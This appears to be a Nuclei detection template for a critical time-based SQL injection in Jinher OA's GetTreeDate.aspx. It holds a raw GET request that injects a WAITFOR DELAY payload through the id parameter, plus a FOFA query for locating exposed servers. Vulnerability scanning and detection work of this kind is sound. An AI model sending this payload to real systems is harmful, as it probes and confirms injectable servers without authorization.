id: jinher-oa-sql-time-GetTreeDate

info:
  name: jinher-oa-sql-time-GetTreeDate
  author: p1z
  severity: critical
  description: |
    金和网络 oa GetTreeDate.aspx 文件存在sql注入漏洞
  reference: https://github.com/ibaiw/2023Hvv/blob/main/%E9%87%91%E5%92%8COA%20%E6%9C%AA%E6%8E%88%E6%9D%83.md
  metadata:
    fofa-query: app="金和网络-金和OA"
    hunter-query:
    verified: true
  tags: 2023,jinher,oa,sql

http:
  - raw:
      - |
        GET /C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1%3bWAITFOR+DELAY+'0%3a0%3a5'+--%20and%201=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
        Connection: close


    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code==200'
        condition: and